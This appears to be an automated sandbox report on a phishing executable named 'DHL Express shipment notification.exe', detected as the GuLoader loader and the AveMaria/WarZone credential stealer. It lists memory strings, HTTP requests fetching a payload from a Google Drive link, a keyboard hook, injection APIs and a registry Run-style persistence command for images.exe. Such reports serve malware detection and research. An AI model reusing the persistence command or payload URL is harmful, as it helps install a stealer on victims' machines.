Source: explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000F.00000000.924171358.00000000096F1000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.974913981.00000000096F1000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5687107200.00000000096F1000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.comr9
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external
Source: DHL Express shipment notification.exe, 0000000E.00000003.883756039.00000000019C0000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: images.exe, 0000001D.00000003.1347566980.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330037634.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1330644774.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1324727893.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/
Source: images.exe, 0000001D.00000003.1319610421.00000000018CC000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319522456.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/#9
Source: images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidum
Source: DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/%%doc-10-6k-docs.googleusercontent.com
Source: DHL Express shipment notification.exe, 0000000E.00000002.1021086684.00000000019B3000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1016795564.00000000019C8000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.908533186.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.906400383.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/XM
Source: DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe549
Source: images.exe, 0000001D.00000003.1322260099.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: https://docs.google.com/nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleuserco
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/(
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907055660.00000000019B5000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.889117019.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.1017950200.00000000019AF000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1319155613.00000000018B1000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g4
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g8D
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020887639.0000000001988000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9gX
Source: DHL Express shipment notification.exe, 0000000E.00000003.884180959.00000000019B5000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9geJYQtWVvXHi4Ubp9Y
Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: DHL Express shipment notification.exe, images.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000F.00000000.971659582.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5683269966.00000000093E0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.920969135.00000000093E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4tipe54913jcp7asj48qkhdgaodfoob7/1638383100000/11612195336931281153/*/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-74-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nonceSigner?nonce=g9j0jkqh8v4q0&continue=https://doc-0c-74-docs.googleusercontent.com/docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e%3Ddownload&hash=e91gtvc094ihcc9ia8q0ll4kbtb8mnkn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=PCUCReJmoWpqNNqKO4_UkEHyi29_BVE3-UTrB3VIWMDCK28Vi4C51ApTQuDt5eJCkdd7valarSBw5jjh5O2AbOqMKaOCQXxYdvMjXDuxh9JnqNzMHtnTZsorv6Dq7QaujUxZ97nfTtPnW-orDUqsKBpi9peJYQtWVvXHi4Ubp9Y
Source: global traffic	HTTP traffic detected: GET /docs/securesc/sk5nfb6a71bsi4kb0hoi93t8ubc457n9/ga5uidumionb8nmhr97qp7gio0ican94/1638383175000/11612195336931281153/13277406679786744507Z/1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g?e=download&nonce=g9j0jkqh8v4q0&user=13277406679786744507Z&hash=rku0rgkmu2p00qlf7mek88sknpvsopf2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0c-74-docs.googleusercontent.comCookie: AUTH_1nlrmlvj42thkf2l2rvk4km6kc4dhvlu_nonce=g9j0jkqh8v4q0

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.161:443 -> 192.168.11.20:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49766 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\ProgramData\images.exe

Windows user hook set: 0 keyboard low level C:\ProgramData\images.exe

Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Malicious sample detected (through community Yara rule)

Show sources

Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown

Source: DHL Express shipment notification.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.images.exe.18d2b78.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 14.3.DHL Express shipment notification.exe.1a02148.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228AA34
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02296860
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228D8CF
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228DFFD
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022939E4
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022949D1
Source: C:\ProgramData\images.exe	Code function: 21_2_0228AA34
Source: C:\ProgramData\images.exe	Code function: 21_2_02296860
Source: C:\ProgramData\images.exe	Code function: 21_2_0228D8CF
Source: C:\ProgramData\images.exe	Code function: 21_2_0228DFFD
Source: C:\ProgramData\images.exe	Code function: 21_2_022939E4
Source: C:\ProgramData\images.exe	Code function: 21_2_022949D1

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228AA34 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022960AF LoadLibraryA,NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228D8CF NtAllocateVirtualMemory,
Source: C:\ProgramData\images.exe	Code function: 21_2_0228AA34 NtWriteVirtualMemory,
Source: C:\ProgramData\images.exe	Code function: 21_2_022960AF LoadLibraryA,NtProtectVirtualMemory,
Source: C:\ProgramData\images.exe	Code function: 21_2_0228D8CF NtAllocateVirtualMemory,

Source: DHL Express shipment notification.exe, 00000005.00000002.740264413.0000000002330000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exeFE2XJ vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 00000005.00000000.594334059.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000000.735045174.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000002.1030995382.000000001F243000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe, 0000000E.00000003.908372108.0000000001A08000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe
Source: DHL Express shipment notification.exe	Binary or memory string: OriginalFilenameSlesk8.exe vs DHL Express shipment notification.exe

Source: DHL Express shipment notification.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.14.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: edgegdi.dll
Source: C:\ProgramData\images.exe	Section loaded: edgegdi.dll
Source: C:\ProgramData\images.exe	Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edgegdi.dll

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"

Source: DHL Express shipment notification.exe

Static PE information: invalid certificate

Source: DHL Express shipment notification.exe	Virustotal: Detection: 25%
Source: DHL Express shipment notification.exe	ReversingLabs: Detection: 11%

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File read: C:\Users\user\Desktop\DHL Express shipment notification.exe

Jump to behavior

Source: DHL Express shipment notification.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\ProgramData\images.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe
Source: C:\ProgramData\images.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372

Jump to behavior

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@15/2@6/6

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp
Source:	Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: DHL Express shipment notification.exe, 0000000E.00000003.906801058.0000000001A0D000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.1001852923.00000000134B0000.00000040.00000001.sdmp, images.exe, 0000001D.00000003.1347841343.00000000018DE000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.738081811.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_00406464 push edx; iretd
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0040A07F push ds; iretd
